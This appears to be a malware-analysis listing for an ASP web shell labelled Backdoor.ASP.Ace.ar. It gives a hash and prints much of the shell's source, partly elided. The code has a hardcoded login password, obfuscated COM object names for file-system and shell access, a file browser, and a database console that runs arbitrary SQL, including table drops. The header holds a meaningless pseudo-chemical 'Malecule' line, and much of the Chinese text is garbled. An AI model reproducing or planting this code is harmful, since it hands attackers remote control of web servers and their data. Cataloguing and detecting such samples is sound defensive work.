Backdoor.ASP.Ace.ar
ASP web shell backdoor
Classic ASP ADO database administration shellASP page instantiates a concealed COM ProgID
SHA-2564b67211d0375dc254af1db2f5eb6f1d049d46cf596b6da18f7f2db9d1241f8a5
MaleculeO₄(C₄As₃CoXe)H₅(Cm₂Db₂F₁₀OsPo)
Evidence
1<%
2'########��Ȩ���� - �����ϱ�վwww.gxgl.com
3Server.ScriptTimeout=50000
4Response.Buffer = True
5On Error Resume Next
6ApplicationName = "Aspվ������6.0" '#####��������/����
7UserPass = "82713957" '#####��ʼ��¼����
8ShowFileIco = True '#####�Ƿ���ʾͼ��,FalseΪ������ͼ��
9IcoPath = "http://www.GXGL.com/images/FileType/" '#####ͼ��Ŀ¼,������
10URL = Request.ServerVariables("URL")
11ServerIP = Request.ServerVariables("LOCAL_ADDR")
12Action = Request("Action")
13RootPath = Server.MapPath(".")
14WWWRoot = Server.MapPath("/")
15FolderPath = Request("FolderPath")
16FName = Request("FName")
17BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"
18
19If Session("GXGL")<>UserPass Then
20 If Request.Form("LPass")<>"" Then
21 If Request.Form("LPass")=UserPass Then
22 Session("GXGL")=UserPass
23 Response.Redirect URL
24 Else
25 response.write"��֤ʧ�ܣ�"
26 End If
27 Else
28 SI="<center style='font-size:12px'><br><br>��ӭʹ��ASPվ������<br><br>"
29 SI=SI&"<form action='"&URL&"' method='post'>"
30 SI=SI&"���������룺<input name='LPass' type='password' size='15'>"
31 SI=SI&" <input type='submit' value='��¼'></form></center>"
32 Response.Write SI
33 End If
34 Response.End
35End If
36
37sub ShowErr()
38 If Err Then
39 Response.Write"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
40 Err.Clear:Response.Flush
41 End If
42end sub
43
44
45Dim ObT(13,2)
46ObT(0,0) = "Sc"&DEfd&"rip"&DEfd&"ting"&DEfd&".F"&DEfd&"ileS"&DEfd&"yste"&DEfd&"mObj"&DEfd&"ect"
47 ObT(0,2) = "��������"
48ObT(1,0) = "w"&DEfd&"sc"&DEfd&"ri"&DEfd&"pt.s"&DEfd&"he"&DEfd&"ll"
70:19… ail.SmtpMail.1"
71 ObT(12,2) = "SmtpMail�������"
72ObT(13,0) = "Microsoft.XMLHTTP"
73 ObT(13,2) = "���ݴ������"
74
75For i=0 To 13
76 Set T=Server.CreateObject(ObT(i,0))
77 If -2147221005 <> Err Then
78 IsObj=True
⋯7 lines
86
87
88Function RePath(S)
89 RePath=Replace(S,"\","\\")
90End Function
91
92Function RRePath(S)
93 RRePath=Replace(S,"\\","\")
94End Function
95
96If FolderPath<>"" then
⋯4 lines
118:25… idden"" name=""Action"">"
119 SI=SI&"<input type=""hidden"" name=""FName"">"
120 SI=SI&"</form>"
121 SI=SI&"<table width='100%' height='100%' border='0' cellpadding='0' cellspacing='0' bgcolor='menu'>"
122 SI=SI&"<tr><td height='30' colspan='2'>"
123 SI=SI&"<table width='100%' height='25' border='0' cellpadding='0' cellspacing='0'>"
124 SI=SI&"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
125 SI=SI&"<tr><td width='60' align='center'>��ַ����</td><td>"
126 SI=SI&"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
127 SI=SI&"</td><td width='60' align='center'><input name='Submit' type='submit' value='ת��'>"
128 SI=SI&"</td></tr></form></table></td></tr><tr><td width='160'>"
317:11… .Write SI
318End Function
319
320
321Function DbManager()
322 SqlStr=Trim(Request.Form("SqlStr"))
323 DbStr=Request.Form("DbStr")
324
325 SI=SI&"<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
326 SI=SI&"<form name='DbForm' method='pos …
⋯4 lines
342 If Len(DbStr)>40 Then
343
344 Set Conn=CreateObject(ObT(5,0))
345 Conn.Open DbStr
346 Set Rs=Conn.OpenSchema(20)
347 SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
348 Rs.MoveFirst
349 Do While Not Rs.Eof
350 If Rs("TABLE_TYPE")="TABLE" then
351 TName=Rs("TABLE_NAME")
352 SI=SI&"<td align=center><a href='javascript:FullSqlStr(""DROP TABLE ["&TName&"]"",1)'>[ del ]</a><br>"
353 SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
354 End If
⋯8 lines
363If Len(SqlStr)>10 Then
364
365 If LCase(Left(SqlStr,6))="select" then
366 SI=SI&"ִ����䣺"&SqlStr
367 Set Rs=CreateObject("Adodb.Recordset")
368 Rs.open SqlStr,Conn,1,1
369 FN=Rs …